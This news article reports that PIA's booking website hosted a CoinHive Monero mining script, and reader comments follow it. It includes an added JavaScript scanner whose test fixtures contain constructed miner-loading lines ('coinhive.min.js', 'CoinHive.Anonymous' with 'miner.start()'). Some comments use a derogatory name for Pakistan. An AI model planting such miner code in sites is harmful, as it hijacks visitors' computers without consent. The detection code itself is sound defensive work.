PIA’s Official Website May be Mining Cryptocurrency Using Your Computer

PIA recently launched its new web portal for booking tickets online. Thanks to a tip we received yesterday, ProPakistani can confirm that PIA’s new website has been hosting a cryptocurrency mining script on its servers, capable of mining crypto-coins using computers of the people visiting the website.

What is Cryptocurrency Mining?

Most cryptocurrencies are obtained through a process called mining. Putting it simply, the process involves solving some complex calculations to add new coin transactions to a public ledger. Mining is a very time and resource intensive process and people who commit their hardware for this get rewarded in the form of new coins.



Is it Harmful?

It won’t harm your computer in the traditional sense like a virus would, but it will hog your PC’s resources, slowing it down considerably as long as the mining process is ongoing.

However, it is definitely unethical — no one should use your computer’s resources to mine cryptocurrency without your explicit permission.

On Monday, 12th February, ProPakistani received a tip from three cybersecurity enthusiasts, Sajjad Haider, Asad Memon and Fahim Mandvia, about something fishy they found on PIA’s new website. The co-founder of RemoteInterview and the person behind JavaScript’s ‘Urdish’ dialect, Asad is a veteran programmer and developer, while Sajjad Haider is an Information Security Professional.

“It seems that PIA has recently launched this new site,” he added. “It’s based on WordPress and whenever someone uses WordPress, it opens a can of worms.”

Asad sent us a link to the script, hiding in the “bootstrap.js” file within the JavaScript directory of PIA’s website. We have verified that the JavaScript function is clearly designed to mine Monero, a form of cryptocurrency, on a visitor’s computer through the browser. At the time of writing, one Monero (one XMR) is worth $246.

[Image: scripts found]

Moreover, they were also able to extract the CoinHive user ID of the miner in question hiding in another JavaScript file in the parent directory.

CoinHive, an online service, offers a JavaScript miner for the Monero Blockchain that can be embedded on any website.

The script can then run directly from the browser to mine cryptocurrency on the computers of the users who visit the website.

Barely a couple of hours after we checked it out, both the files were modified and are now inaccessible on PIA’s website (last modified at 9:11 PM, Monday, 12th February).

Fortunately, Asad was able to find an archived version of the website which has both the files. Not only that, but the archival service also shows a clear warning that it has detected malicious behavior on the website that matches CoinHive’s JavaScript variables.

[Image: Malicious behavior and content in PIA’s official website]
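A site owner can run the same kind of check the archival service performed, over their own web root. The scanner below is an added example, not code from PIA's site or from the article's sources; it matches the names used by CoinHive's public embed API (`CoinHive.Anonymous`, `CoinHive.User`, `CoinHive.Token`, and the `coinhive.min.js` loader), and every file's contents and the site key are constructed. A miner that has been obfuscated will not match these strings, so a clean result is not proof of a clean site.

```javascript
// Added example: flag CoinHive miner indicators in a site's JavaScript files.
// All sample file contents and the site key below are constructed.
const SAMPLE_KEY = 'EXAMPLE0SITE0KEY0CONSTRUCTED0000';

const INDICATORS = [
  { name: 'loader-url', re: /\b(?:coinhive|coin-hive)\.com\/lib\/[\w.-]+\.js/i },
  { name: 'miner-constructor', re: /\bCoinHive\s*\.\s*(?:Anonymous|User|Token)\s*\(/ },
  { name: 'bracket-access', re: /\[\s*['"]CoinHive['"]\s*\]/ },
];
// The site key is the first string argument of the miner constructor.
const SITE_KEY = /CoinHive\s*\.\s*(?:Anonymous|User|Token)\s*\(\s*['"]([A-Za-z0-9]{8,64})['"]/g;

function scanSource(fileName, source) {
  const hits = [];
  source.split(/\r?\n/).forEach((line, i) => {
    for (const { name, re } of INDICATORS) {
      if (re.test(line)) hits.push({ line: i + 1, indicator: name });
    }
  });
  const siteKeys = [...new Set([...source.matchAll(SITE_KEY)].map((m) => m[1]))];
  return { file: fileName, hits, siteKeys };
}

// Scan a map of { path: contents } and keep only files with findings.
function scanSite(files) {
  return Object.entries(files)
    .map(([name, source]) => scanSource(name, source))
    .filter((r) => r.hits.length > 0 || r.siteKeys.length > 0);
}

const SAMPLE_FILES = {
  'js/bootstrap.js': [
    '/* library code (constructed excerpt) */',
    'if (typeof jQuery === "undefined") { throw new Error("requires jQuery"); }',
    'var s = document.createElement("script");',
    's.src = "https://coinhive.com/lib/coinhive.min.js";',
    'document.head.appendChild(s);',
  ].join('\n'),
  'js/custom.js': [
    'var miner = new CoinHive.Anonymous("' + SAMPLE_KEY + '");',
    'miner.start();',
  ].join('\n'),
  'js/menu.js': 'document.querySelector(".nav").classList.toggle("open");',
};

const report = scanSite(SAMPLE_FILES);
for (const r of report) console.log(r.file, JSON.stringify(r.hits), r.siteKeys);
```

An extracted site key identifies the CoinHive account receiving the mined coins, which is worth preserving in an incident report before the files are cleaned up.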

It is extremely unlikely that PIA itself would try to embed cryptocurrency mining scripts in its official website. Not only does it seem reckless, it is also somewhat pointless, considering that the website would barely make 1-2 XMRs per month ($250 – $500 according to a rough estimate).

“It’s most likely a hack or a greedy employee,” added Asad.

Regardless, a company of such stature should keep an eye on its web portal. Recently, more and more websites have been caught trying to run mining scripts on unsuspecting users.

If you suspect your computer is acting somewhat slow, you can run your browser’s task manager (SHIFT + ESC in Chrome) to check if a particular tab is using too many resources. Moreover, you can also use ad-blockers to detect if a mining script is running in a tab or use the No Coin extension for Chrome/Firefox.


  • Muhammad Ashraf

    Cryptocurrency usually requires graphics cards or special hardware. How come it can be generated from a normal computer having very nominal resources?

    • Asad Memon

      Monero is designed to be mined on CPU alone. Which makes it great for this.

    • continuedhere

      If you could remotely steal one rupee from every person in Jihadistan without facing any consequences would you say that is a lucrative crime? This is a bit like that except that you are only stealing from every visitor to that specific site.

    • Ifhrmf

      It is simple: the more traffic you have, the more power you get. It’s like getting 100% from one resource, it is hunting a few percent from each visitor…

    • muhammadbilal

      It can be mined even from your smartphone, it just needs a computer. GPUs have much more powerful processors, that’s why they are mostly used. But if there are 100s of low power computers mining at the same time, it will result in 50-80% of 1 GPU.

  • continuedhere

    It would have been simpler to just say that PIA’s website was hacked. It’s not unusual for Jihadistani websites to get hacked because management doesn’t care and employees are incompetent. Often even the developers don’t care. I remember reporting that superasia’s site was hacked to their whois email address. I don’t think the devs fixed it in a timely manner.

    • FuriousNinja

      What you are saying might be true, but utter contempt is shown when you can’t even properly mention the country’s name due to your biased opinion.

      Are you Indian? Because it is the typical behavior shown by some of them.

  • Nain Ali

    Correct me if I’m wrong, their website is based on .NET, not on WordPress??? I mean PIA WordPress would be really “A bail mujhay mar” website. Prone to really big hacks and leak of customer information.

    • Rehan Ahmed

      Exactly – it’s baffling. And yes, it is definitely using WordPress – verified it.

      • Gemini

        What is the need to verify? I have seen this template plenty of times :D

        • Gemini

          I am running more than 100 WordPress websites, and not 1 has been hacked till today. There are precautions which can save you from attacks. But these noob developers from “5000 main website banwaye” don’t even care to check these loopholes.

    • Gemini

      Even this website ProPakistani is using WordPress as well and they haven’t changed their login URL /wp-admin yet, which is the first step to get attacked lol.

  • Hamza

    The error tells you a lot, the site is deployed by XAMPP Path and other info

    C:xampphtdocspianewwp-contentthemespiaxd

    It looks like they don’t want to invest in right deployment for things. A proper Linux owner to maintain the site, harden it etc.